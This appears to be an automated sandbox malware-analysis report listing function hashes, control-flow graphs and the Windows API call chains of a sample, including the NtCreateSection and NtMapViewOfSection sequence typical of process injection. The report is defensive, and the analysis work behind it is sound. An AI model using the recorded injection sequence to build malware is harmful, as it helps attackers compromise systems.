                                                                                                          • Instruction ID: 940fbc0dab850d529529b346cdf795a2ab2b5bab9bf26de1e63129e490b6217b
                                                                                                          • Opcode Fuzzy Hash: 60829e25b52dc9c286bcfc8c1594e64d5fadf153f3335295984f2997cccd9bdc
                                                                                                          • Instruction Fuzzy Hash: 4D514A71808391EFCB12DF35C8956967FB4EE5232472842EFD8A1AA1F3C3394102DB99
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004012DC Relevance: 2.6, Strings: 2, Instructions: 138COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899446606.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: O$u
                                                                                                          • API String ID: 0-1426094074
                                                                                                          • Opcode ID: 00f0e6f876bcc7b1bde4355ec0cdb43d68c41d3e4076bba62f9fb807bd46335b
                                                                                                          • Instruction ID: 186db2605b7e3a4196eee0c3335ff4411e0107172b2e21921e8dcdeaea740e4f
                                                                                                          • Opcode Fuzzy Hash: 00f0e6f876bcc7b1bde4355ec0cdb43d68c41d3e4076bba62f9fb807bd46335b
                                                                                                          • Instruction Fuzzy Hash: 6F415972848391EFCB12DF25C8956967FB4EF5232472842AFD8A1AA1F3C3354102CB99
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004012EC Relevance: 2.6, Strings: 2, Instructions: 138COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899446606.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: O$u
                                                                                                          • API String ID: 0-1426094074
                                                                                                          • Opcode ID: 9e7b9b215a69e610e90231314c889fa282a587561654e2ad738d2177744eceed
                                                                                                          • Instruction ID: a91aca37e3be38c6bdcdb449f9ae7727b8e4dd8904d1e33b629b6c30361965f1
                                                                                                          • Opcode Fuzzy Hash: 9e7b9b215a69e610e90231314c889fa282a587561654e2ad738d2177744eceed
                                                                                                          • Instruction Fuzzy Hash: 85415B71848391DFCB12DF25D8956967FB4EE5232472842FFD8A1AA1F2C3354102CB99
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004013BA Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899446606.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: S
                                                                                                          • API String ID: 0-543223747
                                                                                                          • Opcode ID: 60d6db45c57815d0079f1bd1d5223eed9f74a2ff5f50d055cc682c7432e8ea62
                                                                                                          • Instruction ID: 27aef00ba30489353df1a889fec71363b64b2bbfe6ab54d13b431a78e03c28fc
                                                                                                          • Opcode Fuzzy Hash: 60d6db45c57815d0079f1bd1d5223eed9f74a2ff5f50d055cc682c7432e8ea62
                                                                                                          • Instruction Fuzzy Hash: 60416E72948395DFCB128F39D895596BFB4EE5333932842BFD491AA1F3C2384501CBA9
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004014D8 Relevance: .1, Instructions: 101COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899446606.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7a4c5a06ffa398a92e74a522d908d178b9cb7e63d2e0450eb74668c0348f2fa4
                                                                                                          • Instruction ID: c22b5d678712e874c3708b01174fb826adcc151eb3839776fd57d9632e2febbf
                                                                                                          • Opcode Fuzzy Hash: 7a4c5a06ffa398a92e74a522d908d178b9cb7e63d2e0450eb74668c0348f2fa4
                                                                                                          • Instruction Fuzzy Hash: BD31AE77D156808BCB028B35985259B7FB0DE5333535946EBC491A61F2C3388606C7A9
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004013FB Relevance: .1, Instructions: 87COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899446606.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4b1f0159f97d466bc91f5776e0bc3e363edbf1d05b17888ab0c7daa3a3c8438c
                                                                                                          • Instruction ID: 9e55921de2574c657f41f34ef6731c0788b7729c1e8725f62aa53682a3b93476
                                                                                                          • Opcode Fuzzy Hash: 4b1f0159f97d466bc91f5776e0bc3e363edbf1d05b17888ab0c7daa3a3c8438c
                                                                                                          • Instruction Fuzzy Hash: 78217C75D48345DBCB129E25D8516E73FA4EF9233576402BBE4826A0F2C2384606DBBF
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00401406 Relevance: .1, Instructions: 82COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899446606.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1ca2780711d82aa462e2c3337fc74dd66a5598a0a40ee9b3fd7cead32aae73b3
                                                                                                          • Instruction ID: 769907c8ee4e2f7cf64fba8ba9f8b23e145ea64c519f6a614380a457a23c39ea
                                                                                                          • Opcode Fuzzy Hash: 1ca2780711d82aa462e2c3337fc74dd66a5598a0a40ee9b3fd7cead32aae73b3
                                                                                                          • Instruction Fuzzy Hash: 31219B75D48285DBCB128E25D4506D73FA4EF9233576442BBD0826A0F2C3340602DBAF
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00401413 Relevance: .1, Instructions: 79COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899446606.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8d2a1cf2239d74f103a93650217df68cbc67bafc0d100bb7a7d4b38e3cea7e99
                                                                                                          • Instruction ID: ad73ea8454fe0e189ec9174c773bae34e5c54e3eefe866846b87b01581482766
                                                                                                          • Opcode Fuzzy Hash: 8d2a1cf2239d74f103a93650217df68cbc67bafc0d100bb7a7d4b38e3cea7e99
                                                                                                          • Instruction Fuzzy Hash: 68219776D49385DBCF128F26D8922973FB4EE5333535842EBC4929A0B2C2348601CBA9
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0258C6BE Relevance: .1, Instructions: 61COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899774511.0000000002587000.00000040.00000020.00020000.00000000.sdmp, Offset: 02587000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2587000_file.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                          • Instruction ID: 2e0765c41eac3efecd4a9077fe9e5a0363c3a213d81b43e72510480dbbd56f33
                                                                                                          • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                          • Instruction Fuzzy Hash: E8117072340101AFE744DE55DC80EA673EAFB89261B19806AE908DB311E7B6E801CB64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004026CB Relevance: .0, Instructions: 47COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899446606.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c38bdd1c28fa4a2a68309ed83fed7e39b7daf74b08187679615121f3cc341f75
                                                                                                          • Instruction ID: cdd58dca2a837a008a946bbb35dbe0173230e547b11635f62ab1d195229df534
                                                                                                          • Opcode Fuzzy Hash: c38bdd1c28fa4a2a68309ed83fed7e39b7daf74b08187679615121f3cc341f75
                                                                                                          • Instruction Fuzzy Hash: F1014C77704F608ADB038B91E596488BFB0EE022213144AC2C1E05A5EBEB616233C386
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00402698 Relevance: .0, Instructions: 19COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899446606.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9deb172eac83e21007a7a8ecff873d1541951d12bcb9617cba21bb9c86776f0e
                                                                                                          • Instruction ID: 962708b40ab39c170d01331d4ad521e2ade48b8f21a1479749b60a6d9d7c7a73
                                                                                                          • Opcode Fuzzy Hash: 9deb172eac83e21007a7a8ecff873d1541951d12bcb9617cba21bb9c86776f0e
                                                                                                          • Instruction Fuzzy Hash: C3E0C2B9501F10C5A72A8FA2DAA7D88BFB4FA453113025CC4C4904F8BAEF22F131D755
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0040E544 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899461393.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                          • String ID:
                                                                                                          • API String ID: 3016257755-0
                                                                                                          • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                          • Instruction ID: 80ad4cdf73c45067d2aae9fb16ef147e77cb583fea3ae84cb04fc497d1be8e1e
                                                                                                          • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                          • Instruction Fuzzy Hash: 33114772400149FBCF125ED6CC05CEE3F62BB5C358F548826FA5869171D33AD971AB85
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:4.4%
                                                                                                          Dynamic/Decrypted Code Coverage:75.2%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:105
                                                                                                          Total number of Limit Nodes:7
                                                                                                          execution_graph 7753 402e41 7754 402e3a 7753->7754 7756 402ece 7754->7756 7757 4018c9 7754->7757 7758 4018d8 7757->7758 7759 401911 Sleep 7758->7759 7764 4013fb 7759->7764 7761 40192c 7763 40193d 7761->7763 7776 4014f4 7761->7776 7763->7756 7765 401404 7764->7765 7766 4015a9 NtDuplicateObject 7765->7766 7773 4013f2 7765->7773 7767 4015c6 NtCreateSection 7766->7767 7766->7773 7768 401646 NtCreateSection 7767->7768 7769 4015ec NtMapViewOfSection 7767->7769 7771 401672 7768->7771 7768->7773 7769->7768 7770 40160f NtMapViewOfSection 7769->7770 7770->7768 7775 40162d 7770->7775 7772 40167c NtMapViewOfSection 7771->7772 7771->7773 7772->7773 7774 4016a3 NtMapViewOfSection 7772->7774 7773->7761 7774->7773 7775->7768 7777 401503 7776->7777 7778 4015a9 NtDuplicateObject 7777->7778 7785 4016c5 7777->7785 7779 4015c6 NtCreateSection 7778->7779 7778->7785 7780 401646 NtCreateSection 7779->7780 7781 4015ec NtMapViewOfSection 7779->7781 7783 401672 7780->7783 7780->7785 7781->7780 7782 40160f NtMapViewOfSection 7781->7782 7782->7780 7786 40162d 7782->7786 7784 40167c NtMapViewOfSection 7783->7784 7783->7785 7784->7785 7787 4016a3 NtMapViewOfSection 7784->7787 7785->7763 7786->7780 7787->7785 7948 401501 7949 40152d 7948->7949 7950 4015a9 NtDuplicateObject 7949->7950 7957 4016c5 7949->7957 7951 4015c6 NtCreateSection 7950->7951 7950->7957 7952 401646 NtCreateSection 7951->7952 7953 4015ec NtMapViewOfSection 7951->7953 7955 401672 7952->7955 7952->7957 7953->7952 7954 40160f NtMapViewOfSection 7953->7954 7954->7952 7958 40162d 7954->7958 7956 40167c NtMapViewOfSection 7955->7956 7955->7957 7956->7957 7959 4016a3 NtMapViewOfSection 7956->7959 7958->7952 7959->7957 7788 424180 7789 424197 7788->7789 7792 423b30 7789->7792 7791 424448 7794 423b56 __write_nolock 7792->7794 7793 423cf8 LocalAlloc 7798 423d1c 7793->7798 7794->7793 7795 423fe3 VirtualProtect 7796 424009 7795->7796 7797 424040 LoadLibraryW 7796->7797 7799 4240c9 7797->7799 7798->7795 7799->7791 7826 402e07 7827 402e17 7826->7827 7828 4018c9 15 API calls 7827->7828 7829 402ece 7827->7829 7828->7829 7800 40a648 7801 40a660 _wcslen 7800->7801 7805 40a658 7800->7805 7806 40ade3 7801->7806 7803 40ade3 __calloc_crt RtlAllocateHeap 7804 40a684 _wcslen __NMSG_WRITE 7803->7804 7804->7803 7804->7805 7809 40adec 7806->7809 7808 40ae29 7808->7804 7809->7808 7810 40da32 7809->7810 7811 40da3e __calloc_crt 7810->7811 7812 40da4a 7811->7812 7813 40da6c RtlAllocateHeap 7811->7813 7812->7809 7813->7811 7813->7812 7909 4012aa 7910 4012b9 7909->7910 7911 4015a9 NtDuplicateObject 7910->7911 7918 4013f2 7910->7918 7912 4015c6 NtCreateSection 7911->7912 7911->7918 7913 401646 NtCreateSection 7912->7913 7914 4015ec NtMapViewOfSection 7912->7914 7916 401672 7913->7916 7913->7918 7914->7913 7915 40160f NtMapViewOfSection 7914->7915 7915->7913 7919 40162d 7915->7919 7917 40167c NtMapViewOfSection 7916->7917 7916->7918 7917->7918 7920 4016a3 NtMapViewOfSection 7917->7920 7919->7913 7920->7918 7738 251b681 7739 251b690 7738->7739 7742 251be21 7739->7742 7745 251be3c 7742->7745 7743 251be45 CreateToolhelp32Snapshot 7744 251be61 Module32First 7743->7744 7743->7745 7746 251be70 7744->7746 7747 251b699 7744->7747 7745->7743 7745->7744 7749 251bae0 7746->7749 7750 251bb0b 7749->7750 7751 251bb1c VirtualAlloc 7750->7751 7752 251bb54 7750->7752 7751->7752 7850 4018d4 7851 4018ea 7850->7851 7852 401911 Sleep 7851->7852 7853 4013fb 7 API calls 7852->7853 7854 40192c 7853->7854 7855 4014f4 7 API calls 7854->7855 7856 40193d 7854->7856 7855->7856 7945 40915c 7946 40ade3 __calloc_crt RtlAllocateHeap 7945->7946 7947 409168 7946->7947

                                                                                                          Executed Functions

                                                                                                          Function 004012AB Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 392COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 0 4012ab-4012b2 1 4012c3 0->1 2 4012b9-4012da 0->2 1->2 7 4012ee 2->7 8 4012df-4012ea 2->8 7->8 9 4012f1-40138a call 401186 7->9 8->9 16 401408 9->16 17 40138c 9->17 20 40140b-401411 16->20 18 401404 17->18 19 40138e-40139c 17->19 18->16 21 401415 18->21 22 4013fa-401403 19->22 23 40139e-40143e 19->23 24 401418-40143c 20->24 21->20 21->24 22->18 28 40143f-40145b call 401186 23->28 24->28 34 4013f2-4013f8 28->34 35 40145d-401481 28->35 36 4014a0-4014a3 35->36 37 401483-401487 35->37 39 401502-401553 call 401186 36->39 40 4014a5-4014b4 36->40 37->36 38 401489-40148e 37->38 38->36 42 401491-40149f 38->42 57 401555 39->57 58 401558-40155d 39->58 45 4014b6-4014b8 40->45 42->36 45->45 46 4014ba-4014ce 45->46 48 4014d0-4014d2 46->48 49 4014ea-4014f1 46->49 57->58 60 401563-401574 58->60 61 401878-401880 58->61 64 401876-401897 60->64 65 40157a-4015a3 60->65 61->58 72 4018a6 64->72 73 40189d-4018c6 call 401186 64->73 65->64 74 4015a9-4015c0 NtDuplicateObject 65->74 72->73 74->64 75 4015c6-4015ea NtCreateSection 74->75 78 401646-40166c NtCreateSection 75->78 79 4015ec-40160d NtMapViewOfSection 75->79 78->64 82 401672-401676 78->82 79->78 81 40160f-40162b NtMapViewOfSection 79->81 81->78 85 40162d-401643 81->85 82->64 83 40167c-40169d NtMapViewOfSection 82->83 83->64 86 4016a3-4016bf NtMapViewOfSection 83->86 85->78 86->64 88 4016c5 call 4016ca 86->88
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.951493417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_400000_wfshtit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: O$u
                                                                                                          • API String ID: 0-1426094074
                                                                                                          • Opcode ID: fc28355d1bd9b55e96d57c391207adfdeb1b039e1bb682a9e10912c63c4cda28
                                                                                                          • Instruction ID: 6c0fdc4d84967332c471f3e59838abf2ed393e8be5ddaf11b6e9a247f6d6b291
                                                                                                          • Opcode Fuzzy Hash: fc28355d1bd9b55e96d57c391207adfdeb1b039e1bb682a9e10912c63c4cda28
                                                                                                          • Instruction Fuzzy Hash: F5D12571904245EBDB219F55CC44EAB7BB8FF82714F24417BE952BA1F1D2388602CB6A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004014F4 Relevance: 10.7, APIs: 7, Instructions: 181nativeCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 92 4014f4-401553 call 401186 104 401555 92->104 105 401558-40155d 92->105 104->105 107 401563-401574 105->107 108 401878-401880 105->108 111 401876-401897 107->111 112 40157a-4015a3 107->112 108->105 119 4018a6 111->119 120 40189d-4018c6 call 401186 111->120 112->111 121 4015a9-4015c0 NtDuplicateObject 112->121 119->120 121->111 122 4015c6-4015ea NtCreateSection 121->122 125 401646-40166c NtCreateSection 122->125 126 4015ec-40160d NtMapViewOfSection 122->126 125->111 129 401672-401676 125->129 126->125 128 40160f-40162b NtMapViewOfSection 126->128 128->125 132 40162d-401643 128->132 129->111 130 40167c-40169d NtMapViewOfSection 129->130 130->111 133 4016a3-4016bf NtMapViewOfSection 130->133 132->125 133->111 135 4016c5 call 4016ca 133->135
                                                                                                          APIs
                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401608
                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401626
                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401667
                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401698
                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016BA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.951493417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_400000_wfshtit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                          • String ID:
                                                                                                          • API String ID: 1546783058-0
                                                                                                          • Opcode ID: 718cf7cf2070750d6a03261995fd349e41501109dfa1350d1f46578160f340bf
                                                                                                          • Instruction ID: 17c8b5c6b7d03a249af4a1ce3f33b6d11283f5bd133b62a523f5e2d8a45d1619
                                                                                                          • Opcode Fuzzy Hash: 718cf7cf2070750d6a03261995fd349e41501109dfa1350d1f46578160f340bf
                                                                                                          • Instruction Fuzzy Hash: 0D512D71900205BFEB209F91CC48FEF7BB8EF85B00F104129F912BA2E5E6749941CB65
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00401501 Relevance: 10.7, APIs: 7, Instructions: 174nativeCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 139 401501-401553 call 401186 146 401555 139->146 147 401558-40155d 139->147 146->147 149 401563-401574 147->149 150 401878-401880 147->150 153 401876-401897 149->153 154 40157a-4015a3 149->154 150->147 161 4018a6 153->161 162 40189d-4018c6 call 401186 153->162 154->153 163 4015a9-4015c0 NtDuplicateObject 154->163 161->162 163->153 164 4015c6-4015ea NtCreateSection 163->164 167 401646-40166c NtCreateSection 164->167 168 4015ec-40160d NtMapViewOfSection 164->168 167->153 171 401672-401676 167->171 168->167 170 40160f-40162b NtMapViewOfSection 168->170 170->167 174 40162d-401643 170->174 171->153 172 40167c-40169d NtMapViewOfSection 171->172 172->153 175 4016a3-4016bf NtMapViewOfSection 172->175 174->167 175->153 177 4016c5 call 4016ca 175->177
                                                                                                          APIs
                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401608
                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401626
                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401667
                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401698
                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016BA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.951493417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_400000_wfshtit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                          • String ID:
                                                                                                          • API String ID: 1546783058-0
                                                                                                          • Opcode ID: 9984b560c3149dd7a735e47dd78e2cd68fd0edf502ba838df985c043765e37bb
                                                                                                          • Instruction ID: 6f0604b32057d325caf3f51fa446859acea35a512505d6c4cf197e41671a197c
                                                                                                          • Opcode Fuzzy Hash: 9984b560c3149dd7a735e47dd78e2cd68fd0edf502ba838df985c043765e37bb
                                                                                                          • Instruction Fuzzy Hash: 8C512BB1900249BFEF209F92CC48FEFBBB8EF85700F144159F911AA2E5E6759941CB64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00401528 Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 181 401528-401553 call 401186 185 401555 181->185 186 401558-40155d 181->186 185->186 188 401563-401574 186->188 189 401878-401880 186->189 192 401876-401897 188->192 193 40157a-4015a3 188->193 189->186 200 4018a6 192->200 201 40189d-4018c6 call 401186 192->201 193->192 202 4015a9-4015c0 NtDuplicateObject 193->202 200->201 202->192 203 4015c6-4015ea NtCreateSection 202->203 206 401646-40166c NtCreateSection 203->206 207 4015ec-40160d NtMapViewOfSection 203->207 206->192 210 401672-401676 206->210 207->206 209 40160f-40162b NtMapViewOfSection 207->209 209->206 213 40162d-401643 209->213 210->192 211 40167c-40169d NtMapViewOfSection 210->211 211->192 214 4016a3-4016bf NtMapViewOfSection 211->214 213->206 214->192 216 4016c5 call 4016ca 214->216
                                                                                                          APIs
                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401608
                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401626
                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401667
                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401698
                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016BA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.951493417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_400000_wfshtit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                          • String ID:
                                                                                                          • API String ID: 1546783058-0
                                                                                                          • Opcode ID: 2f760a7a6e5d1e8f12fab574b919c9d6b8d73b05a2dd249efc9c4677c5b04d32
                                                                                                          • Instruction ID: af98140ee9de545a9c2869d3359d5e8b3b7d0483e67685bb764150cfa9c8d530
                                                                                                          • Opcode Fuzzy Hash: 2f760a7a6e5d1e8f12fab574b919c9d6b8d73b05a2dd249efc9c4677c5b04d32
                                                                                                          • Instruction Fuzzy Hash: 6E510871900259BFEB209F92CC48FEFBBB8EF85B10F144159F911AA2A5E7719940CB64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0040153C Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 220 40153c-401553 call 401186 226 401555 220->226 227 401558-40155d 220->227 226->227 229 401563-401574 227->229 230 401878-401880 227->230 233 401876-401897 229->233 234 40157a-4015a3 229->234 230->227 241 4018a6 233->241 242 40189d-4018c6 call 401186 233->242 234->233 243 4015a9-4015c0 NtDuplicateObject 234->243 241->242 243->233 244 4015c6-4015ea NtCreateSection 243->244 247 401646-40166c NtCreateSection 244->247 248 4015ec-40160d NtMapViewOfSection 244->248 247->233 251 401672-401676 247->251 248->247 250 40160f-40162b NtMapViewOfSection 248->250 250->247 254 40162d-401643 250->254 251->233 252 40167c-40169d NtMapViewOfSection 251->252 252->233 255 4016a3-4016bf NtMapViewOfSection 252->255 254->247 255->233 257 4016c5 call 4016ca 255->257
                                                                                                          APIs
                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401608
